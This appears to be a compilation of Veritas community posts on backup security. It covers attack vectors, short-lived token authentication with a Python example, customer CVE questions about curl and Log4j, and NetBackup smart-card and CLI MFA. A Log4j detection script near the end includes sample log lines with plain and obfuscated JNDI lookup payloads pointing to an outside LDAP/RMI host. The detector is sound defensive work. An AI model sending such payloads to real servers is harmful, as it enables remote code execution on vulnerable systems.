Securing Data and Infrastructure: A Comprehensive Approach
Security of data and infrastructure has become a world in itself. So many terms get thrown around (anomaly detection, multifactor authentication, malware scanning, zero trust access, and so on) that it is easy to feel overwhelmed by the options for securing your data, and to wonder what you actually need in your environment and whether it will be enough. What am I really protecting, and am I covering all my bases so that my data and infrastructure are protected? How can I tell with confidence that I have a good security strategy?

One good way I have found to answer that question is to narrow my focus and compartmentalize the areas I need to solve for. First and foremost, I need to figure out what my attack vectors are. Once I have those, I have a finite number of vectors that I can comprehend and think about securing. As part of that exercise, I came up with five attack vectors:

- Users
- Network
- Application
- Storage or data
- Operating systems

Physical hardware security could be a sixth, but I am going to park that as something that is likely already covered, for example because your infrastructure sits in a secure data center, in a locked cage, with cameras around it.

Diagram 1: Attack vectors and security needs

Once I have determined my attack vectors, I can focus on securing those five areas against any type of attack. I must also consider multiple ways to protect any single vector in case one of the mechanisms is breached or compromised (defense in depth). For example, I can have an industry-standard authentication mechanism but also require multifactor authentication in case my credentials are compromised, and I can require quorum approval (multi-person authorization) for any critical operation in case someone does get access to the system. Similarly, on the data front, I need immutability, which prevents data from being modified, and I need indelibility, enforced at the operating system level, so that the data cannot be deleted. You can go as deep into any attack vector as needed, depending on your requirements for making that vector secure. I found this framework very useful in defining my requirements for securing the data and the infrastructure in a data center.

Diagram 2: Responsibility model for security

Once you have identified the attack vectors and the needs across them, your next task is to figure out how to get those requirements met in your environment. For example, you might go to external vendors for password and access management, for authentication, or for malware scanning and anomaly detection. Unfortunately, not everything is available through third-party integrations. Especially at the fundamental operating system layer, you cannot get far with add-ons alone. The system that controls access to the data needs to be immutable in architecture and indelible by design: if someone gets root access to a system, they can simply destroy the data. So you must implement these design principles yourself to get end-to-end protection and true immutability and indelibility. Concepts like zero trust access, removing root privileges, an immutable architecture, managed containers, and network and application isolation are all needed for that end-to-end protection. However, it is complex and time consuming to do on your own.

Another big lift is vulnerability management. With ransomware attacks now constant, attackers look to exploit every vulnerability on any system. Tracking these vulnerabilities and applying their fixes can be a tall order. It is no secret that securing your environment is a team effort that requires a group of security experts who can provide ongoing, continuous protection against a 24-7 team of attackers.

That is where Veritas NetBackup Flex appliances are your natural partners, providing end-to-end security in your environment. With Flex Appliance you get a zero trust-based immutable architecture out of the box, plus continuous vulnerability management that you would not otherwise get by simply installing data protection software on your own systems. Read more on NetBackup Flex Appliance here.

(CEP-19129) Security Administration Dashboard
Interaction Date: June 18 - June 28, 2024
Interaction Type: Q&A Interview / Interactive Research Session
The Veritas Research Team is conducting an interactive research session about the security administration dashboard. This two-part session will first focus on understanding how you define and triage threats, and then on a walkthrough of some security dashboards the design team is creating, to get your feedback. If you are interested in getting more details about this opportunity or in participating in other exciting interactions and are not currently a member of our CPEP program, you can register here: https://cpep.veritas.com then contact us at customer.engagement@veritas.com.

When it comes to SECRETS, how secure is your application?
Introduction

Enterprises running heterogeneous workloads, from on-prem applications to applications spread across several cloud service providers, often struggle to manage credentials securely. We have seen many technical debates about how to find the right balance between security and flexibility, but there is no de facto standard that fits every case. We have seen (sometimes radically) different opinions on "the right way" to manage secrets: "You should always use a vault", "You should encrypt credentials", and the list goes on. To address these challenges, Veritas introduces short-lived token-based authentication for Alta Recovery Vault. Your data's security is paramount to us.

Prior to short-lived tokens, Veritas provided the ability to connect to Alta Recovery Vault with standard credentials (access and secret keys), as shown below:

Diagram 1: Creating a Credential with the Storage Account and Traditional Credentials (Access key and secret) given by Veritas

Disadvantages of using Standard Credentials in Recovery Vault

These standard credentials are long-lived. If compromised, they give attackers ample time to exploit the application, and if they are stolen it is a nightmare to discern which operations were legitimate. The only fail-safe choice is to cumbersomely rotate the keys and redistribute them to customers. This step is often overlooked and adds extra pain for DevOps. (P.S.: it is not as happy as it seems in the adjacent picture.)

Solution

To help alleviate these risks, Veritas has enhanced security by introducing short-lived token-based authentication. Beginning with NetBackup 10.2 for Azure and NetBackup 10.4 for AWS (GCP work in progress), users have cloud storage accounts and a short-lived refresh token to connect securely to the Alta Recovery Vault storage.

These new secrets are added as Credentials in NetBackup Credential Management (as shown in diagrams 2a and 2b). Once the initial connection is established, the Veritas Credential Management API is solely responsible for renewing, refreshing, accessing and sharing the access signature. No more pain rotating the keys and redistributing them! (The cyber security team looks happier and overjoyed.)

Diagram 2a: Creating a Credential with the Storage Account and Refresh Token given by Veritas for Azure
Diagram 2b: Creating a Credential with the Refresh Token given by Veritas for AWS

Solution Benefits

- Enhanced Security: Short-lived tokens have a limited lifespan, reducing the exposure window for potential attacks. If a token is compromised, its validity period is short, minimizing the risk of unauthorized access. Regular token expiration forces re-authentication, so the credential is re-checked at each renewal.
- Mitigating Token Abuse: Tokens authorize access to resources. By making tokens short-lived, we limit the time an attacker can use a stolen token, shrinking the risk window significantly.
- Better Management of Permissions: When permissions change (e.g., user roles or access levels), short-lived tokens pick up the updates on renewal. Long-lived tokens may retain outdated permissions, which is itself a security risk.

Conclusion

Alta Recovery Vault short-lived token authentication adds another layer of ransomware protection, making the application more secure than before. At Veritas, your data's security is paramount to us, and this blog is just one example of the challenges Veritas short-lived tokens can help solve. Veritas is always looking for better ways to secure your data.
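The token lifecycle described above, as an added illustration in Python that is not Veritas code and does not show how the Credential Management API or Alta Recovery Vault actually implements its tokens: an issuer hands out an opaque refresh token, exchanges it for an HMAC-signed access token with a short expiry, and reads the principal's permissions from a role store at mint time, so a role change is reflected at the next renewal and revoking the refresh token stops further minting. The signing key, the 15-minute and 30-day lifetimes, the `backup-svc` principal and the in-memory stores are all assumptions made for this example.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Assumed values for this example only: the issuer's signing key and the
# token lifetimes. In a real service the key lives in the issuer's secret
# store and is never handed to clients.
SIGNING_KEY = b"example-only-signing-key-do-not-reuse"
ACCESS_TTL = 15 * 60          # access tokens live 15 minutes
REFRESH_TTL = 30 * 24 * 3600  # refresh tokens live 30 days

# Constructed stand-in for the issuer's role store. Access tokens are minted
# from whatever is here *now*, so a role change shows up at the next renewal
# instead of living on in a long-lived key.
PERMISSIONS = {"backup-svc": {"read", "write"}}

# Constructed store of issued refresh tokens: token -> (principal, expiry).
# Deleting an entry revokes it: no further access tokens can be minted.
REFRESH_TOKENS: dict = {}


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _sign(payload: bytes) -> str:
    return _b64(hmac.new(SIGNING_KEY, payload, hashlib.sha256).digest())


def issue_refresh_token(principal: str, now: float) -> str:
    """Register a random, opaque refresh token for a principal."""
    token = secrets.token_urlsafe(32)
    REFRESH_TOKENS[token] = (principal, now + REFRESH_TTL)
    return token


def revoke_refresh_token(token: str) -> None:
    """Revocation only has to touch the issuer's own store."""
    REFRESH_TOKENS.pop(token, None)


def mint_access_token(refresh_token: str, now: float) -> str:
    """Exchange a live refresh token for a short-lived, signed access token."""
    entry = REFRESH_TOKENS.get(refresh_token)
    if entry is None:
        raise PermissionError("unknown or revoked refresh token")
    principal, refresh_exp = entry
    if now >= refresh_exp:
        raise PermissionError("refresh token expired")
    claims = {
        "sub": principal,
        "perms": sorted(PERMISSIONS.get(principal, ())),  # read at mint time
        "iat": int(now),
        "exp": int(now) + ACCESS_TTL,
    }
    payload = json.dumps(claims, separators=(",", ":"), sort_keys=True).encode()
    return f"{_b64(payload)}.{_sign(payload)}"


def can_mint(refresh_token: str, now: float) -> bool:
    try:
        mint_access_token(refresh_token, now)
        return True
    except PermissionError:
        return False


def verify_access_token(token: str, now: float) -> dict:
    """Return the claims if the signature checks out and the token is unexpired."""
    payload_b64, _, sig = token.partition(".")
    try:
        payload = _unb64(payload_b64)
    except ValueError:
        raise PermissionError("malformed token")
    # Constant-time comparison so a forged signature leaks no timing signal.
    if not sig or not hmac.compare_digest(_sign(payload), sig):
        raise PermissionError("bad signature")
    claims = json.loads(payload)
    if now >= claims["exp"]:
        raise PermissionError("access token expired")
    return claims


def is_access_token_valid(token: str, now: float) -> bool:
    try:
        verify_access_token(token, now)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    t0 = time.time()
    rt = issue_refresh_token("backup-svc", t0)
    at = mint_access_token(rt, t0)
    print("valid one minute later:", is_access_token_valid(at, t0 + 60))
    print("valid after TTL:", is_access_token_valid(at, t0 + ACCESS_TTL + 1))
    PERMISSIONS["backup-svc"] = {"read"}  # role reduced while the token is live
    print("old token perms:", verify_access_token(at, t0 + 60)["perms"])
    print("renewed perms:", verify_access_token(mint_access_token(rt, t0 + 60), t0 + 120)["perms"])
    revoke_refresh_token(rt)
    print("can still mint:", can_mint(rt, t0 + 120))
```

The two things worth noticing are that an already-issued access token keeps its stale permissions until it expires (which is exactly why the access lifetime is kept short), and that revocation never requires redistributing anything to clients, because only the issuer's refresh-token store changes.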
Here are some additional helpful links:
- Veritas Alta Recovery Vault Technical White Paper
- Veritas Alta Recovery Vault Security Guide
- Veritas Alta Recovery Vault Azure ExpressRoute Overview Guide
- Veritas Alta™ Recovery Vault AWS Direct Connect Overview Guide

Please feel free to give feedback and we can answer any queries! Appreciate everyone's time :)

CVE-2023-38545/6 security vulnerability.
In trying to assess implications of the CURL hack upon Data Insight I see the \DataInsight\perl\site\lib\HTTP\Any\Curl.pm perl module lists libcurl 7.21.6 or newer. While that is a very old version and specifically the CVEs call out:

Affected versions: libcurl 7.69.0 to and including 8.3.0
Not affected versions: libcurl < 7.69.0 and >= 8.4.0 (where a patch has been identified)

we are left to wonder as to the ramifications of system software changes upon the application. Our organization will be patching for the various applications utilizing http calls over Socks5 (mentioned as a proxy in the script) and I will need to know a few facts to enter discussions with our security team.

- Is DI affected by the vulnerability?
- Will DI be adversely affected by patching to the latest library version?
- Has Veritas released any statement on the vulnerability and its products?

Thank you
Pix

(CEP-18692) Security Vendor Survey
Interaction Date: June 21 - June 30, 2023
Interaction Type: Online Survey
Our Cyber Security PM team is interested in getting your feedback about the security vendors in use in your environment (on prem and cloud). If you are interested in participating in other exciting interactions, and are not currently a member of our CPEP program, you can register here: https://cpep.veritas.com then contact us at customer.engagement@veritas.com.

Neutralize threat of cyber-attacks with NetBackup Flex Appliances
89% of all organizations have fallen victim to a successful ransomware attack resulting in unrecoverable data events. See how to significantly reduce the risk of a cyber-attack and recover confidently with an air-gapped turn-key appliance.

NetBackup 10 – Authentication Enhancements with Smart Cards and RBAC
You and your organization have a growing need to ensure authentication methods are robust and resilient. You need to prove you are who you say you are while meeting strict compliance guidelines.

Smart-Card authentication

For many organizations, Smart Cards provide an excellent way to adopt zero trust security models and, in some cases, comply with federal regulations {link}. This can be a challenge when the Smart Card is not part of the same authentication mechanism as NetBackup. This enhancement adds an option to support the smart card without a directory service such as AD or LDAP. NetBackup's smart card authentication is now more flexible and does not have to be associated with a directory service: the user is added simply using the Common Name (CN) or User Principal Name (UPN) from the certificate for user mapping, instead of a complex directory service configuration for the Smart Card. After you toggle on Smart card authentication, you will see the options to proceed without a domain and to choose which certificate mapping attribute to use (see picture 1 below).

Multi-Factor Authentication for CLI users

Your Role-Based Access Control (RBAC) users are granted rights within the WebUI to perform their workload tasks. There are situations where those RBAC users need to work on the command line outside the NetBackup WebUI. There is now a mechanism to allow those users to access the Command Line Interface (CLI), and conversely you can ensure that this new role is delegated only to users who need it. The use case:

- The user already has an RBAC role and has logged into the NetBackup WebUI previously.
- The user needs CLI access for short periods (less than 24 hours).
- In the WebUI, the user must be a member of the new NetBackup Command Line (CLI) Administrator role, in addition to their desired workload RBAC role.

This role allows all commands to be executed by the user, so zero-trust practice dictates granting it only to users with a permissible purpose. From the CLI, the user initiates the login with the following command, paying special attention to the "loginType":

# /usr/openv/netbackup/bin/bpnbat -login -loginType WebUI

{CLI screenshot of 2FA workflow, including WebUI popup}

The approval for the CLI login arrives in the user's WebUI session as a 6-digit code. Since the user already had to authenticate to the WebUI in the configured way, this approval is highly trusted, and it allows the bpnbat command to proceed, granting CLI privileges to the user for the next 24 hours.

In summary, Smart cards are now easier to consume in NetBackup by removing the previous directory service requirement, balancing ease of use with security, and Multi-Factor Authentication for the CLI, paired with the new RBAC role, offers more control over your users.

Apache Tomcat JNDI features used in DI <Pri:1>
With the release of a POC for the Apache Log4j2 CVE, can we confirm Data Insight is or is not affected?
NIST - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Mitre - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
What effect will setting 'MsgNoLookups' or disabling 'trustURLCodebase' have on DI's operations and logging?
ref: https://www.oracle.com/java/technologies/javase/8u121-relnotes.html
Thank you
Pix
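As an added detection example, not part of Pix's question and not Data Insight or Veritas code: the CVE-2021-44228 proof-of-concepts work by getting a `${jndi:...}` lookup into a logged string, and scanners routinely hide it behind nested lookups such as `${lower:j}` or the `:-` default-value syntax (`${env:UNSET:-j}`). The Python below peels off those common obfuscations and flags the line, which is the check you would run over DI's own logs or a web front end's access log while waiting for a vendor statement. The log lines are constructed for this example, and the rewrites it understands (lower, upper, and the default-value branch) are only a subset of Log4j's lookup grammar, so treat it as a triage aid rather than a complete detector.

```python
import re

# Constructed sample lines: one benign request, one plain JNDI probe, and two
# obfuscated probes of the kind seen in CVE-2021-44228 scanning traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://203.0.113.7/y}"',
]

# Innermost ${...} with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What the probe looks like once the obfuscation is peeled away.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate the obfuscation lookups whose result the attacker controls.

    Returns the replacement text, or None to leave the lookup untouched
    (which is what keeps the final ${jndi:...} in place for matching).
    """
    key, _, rest = body.partition(":")
    k = key.strip().lower()
    if k == "lower":
        return rest.lower()
    if k == "upper":
        return rest.upper()
    # ${env:UNSET:-j} or ${::-j}: the variable never resolves, so Log4j
    # substitutes the attacker-chosen default that follows ":-".
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost obfuscation lookups until nothing changes."""
    def repl(match):
        resolved = _resolve(match.group(1))
        return match.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        new_text = INNER_LOOKUP.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_LOOKUP.search(normalize_lookups(line)) is not None


def scan(lines) -> list:
    """Return the indexes of lines carrying a (de-obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"line {i}: {normalize_lookups(SAMPLE_LINES[i])}")
```

Finding probes in a log tells you that you were targeted, not that the lookup fired; whether it did depends on the Log4j version in the product. Note also that `log4j2.formatMsgNoLookups` was only a partial mitigation (its gaps were tracked as CVE-2021-45046), so the durable answer to the question above is the Log4j version Data Insight ships, not a flag.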